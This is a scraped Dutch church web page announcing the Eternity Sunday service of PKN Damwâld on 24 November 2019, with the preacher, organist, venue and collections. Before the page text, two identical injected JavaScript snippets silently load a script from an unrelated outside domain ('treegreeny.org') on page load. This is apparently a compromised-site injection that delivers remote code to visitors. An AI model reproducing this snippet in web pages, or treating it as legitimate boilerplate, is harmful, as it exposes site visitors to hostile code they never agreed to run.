;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 24 november 2019 9:30 uur - PKN Damwâld
zondag 24 november 2019
09:30 uur
Koffie na de dienst

Kerkdienst zondag 24 november 2019 9:30 uur

Thema: Eeuwigheidszondag

Informatie

Voorganger:Ds. S. Boukes
Organist:Johanna van der Weide
Thema:Eeuwigheidszondag
Mededeling:Koffie na de dienst
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Diaconaal doel
Tweede collecte: PKN collecte pastoraat
Uitganscollecte: Onderhoud en inventaris